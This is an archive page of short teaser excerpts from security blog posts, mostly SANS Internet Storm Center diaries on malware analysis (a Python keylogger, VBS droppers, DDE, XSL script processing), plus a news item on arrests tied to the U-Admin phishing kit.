SANS Internet Storm Center – Page 10

[SANS ISC] Simple Python Keylogger

Posted on March 18, 2021 by Xavier

I published the following diary on isc.sans.edu: “Simple Python Keylogger“: A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, …), just by having a look at

The post [SANS ISC] Simple Python Keylogger appeared first on /dev/random.

Continue reading [SANS ISC] Simple Python Keylogger→

[SANS ISC] Defenders, Know Your Operating System Like Attackers Do!

Posted on March 17, 2021 by Xavier

I published the following diary on isc.sans.edu: “Defenders, Know Your Operating System Like Attackers Do!“: Not a technical diary today but more a reflection… When I’m teaching FOR610, I always remind students to “RTFM” or “Read the F… Manual”. I mean to not hesitate to have a look at the

The post [SANS ISC] Defenders, Know Your Operating System Like Attackers Do! appeared first on /dev/random.

Continue reading [SANS ISC] Defenders, Know Your Operating System Like Attackers Do!→

[SANS ISC] Spotting the Red Team on VirusTotal!

Posted on March 6, 2021 by Xavier

I published the following diary on isc.sans.edu: “Spotting the Red Team on VirusTotal!“: Many security researchers like to use the VirusTotal platform. The provided services are amazing: You can immediately have a clear overview of the dangerousness level of a file but… VirusTotal remains a cloud service. It means that, once you uploaded a

The post [SANS ISC] Spotting the Red Team on VirusTotal! appeared first on /dev/random.

Continue reading [SANS ISC] Spotting the Red Team on VirusTotal!→

[ISC SANS] Spam Farm Spotted in the Wild

Posted on March 5, 2021 by Xavier

I published the following diary on isc.sans.edu: “Spam Farm Spotted in the Wild: If there is a place where you can always find juicy information, it’s your spam folder! Yes, I like spam and I don’t delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or

The post [ISC SANS] Spam Farm Spotted in the Wild appeared first on /dev/random.

Continue reading [ISC SANS] Spam Farm Spotted in the Wild→

[SANS ISC] From VBS, PowerShell, C Sharp, Process Hollowing to RAT

Posted on March 4, 2021 by Xavier

I published the following diary on isc.sans.edu: “From VBS, PowerShell, C Sharp, Process Hollowing to RAT“: VBS files are interesting to deliver malicious content to a victim’s computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it looks also like Russian

The post [SANS ISC] From VBS, PowerShell, C Sharp, Process Hollowing to RAT appeared first on /dev/random.

Continue reading [SANS ISC] From VBS, PowerShell, C Sharp, Process Hollowing to RAT→

[SANS ISC] Dynamic Data Exchange (DDE) is Back in the Wild?

Posted on February 19, 2021 by Xavier

I published the following diary on isc.sans.edu: “Dynamic Data Exchange (DDE) is Back in the Wild?‘”: DDE or “Dynamic Data Exchange” is a Microsoft technology for interprocess communication used in early versions of Windows and OS/2. DDE allows programs to manipulate objects provided by other programs, and respond to user actions affecting those objects. FOr a while,

The post [SANS ISC] Dynamic Data Exchange (DDE) is Back in the Wild? appeared first on /dev/random.

Continue reading [SANS ISC] Dynamic Data Exchange (DDE) is Back in the Wild?→

[SANS ISC] Agent Tesla Dropped Through Automatic Click in Microsoft Help File

Posted on February 12, 2021 by Xavier

I published the following diary on isc.sans.edu: “Agent Tesla Dropped Through Automatic Click in Microsoft Help File‘”: Attackers have plenty of resources to infect our systems. If some files may look suspicious because the extension is less common (like .xsl files), others look really safe and make the victim confident

The post [SANS ISC] Agent Tesla Dropped Through Automatic Click in Microsoft Help File appeared first on /dev/random.

Continue reading [SANS ISC] Agent Tesla Dropped Through Automatic Click in Microsoft Help File→

Arrest, Raids Tied to ‘U-Admin’ Phishing Kit

Posted on February 9, 2021 by BrianKrebs

Cyber cops in Ukraine carried out an arrest and several raids last week in connection with the author of a U-Admin, a software package used to administer what’s being called “one of the world’s largest phishing services.” The operation was carried out in coordination with the FBI and authorities in Australia, which was particularly hard hit by phishing scams perpetrated by U-Admin customers. Continue reading Arrest, Raids Tied to ‘U-Admin’ Phishing Kit→

[SANS ISC] VBA Macro Trying to Alter the Application Menus

Posted on February 5, 2021 by Xavier

I published the following diary on isc.sans.edu: “VBA Macro Trying to Alter the Application Menus‘”: Who remembers the worm Melissa? It started to spread in March 1999! In information security, it looks like speaking about prehistory but I spotted a VBA macro that tried to use the same defensive technique

The post [SANS ISC] VBA Macro Trying to Alter the Application Menus appeared first on /dev/random.

Continue reading [SANS ISC] VBA Macro Trying to Alter the Application Menus→

[SANS ISC] New Example of XSL Script Processing aka “Mitre T1220”

Posted on February 2, 2021 by Xavier

I published the following diary on isc.sans.edu: “New Example of XSL Script Processing aka ‘Mitre T1220‘”: Last week, Brad posted a diary about TA551. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic so I decided

The post [SANS ISC] New Example of XSL Script Processing aka “Mitre T1220” appeared first on /dev/random.

Continue reading [SANS ISC] New Example of XSL Script Processing aka “Mitre T1220”→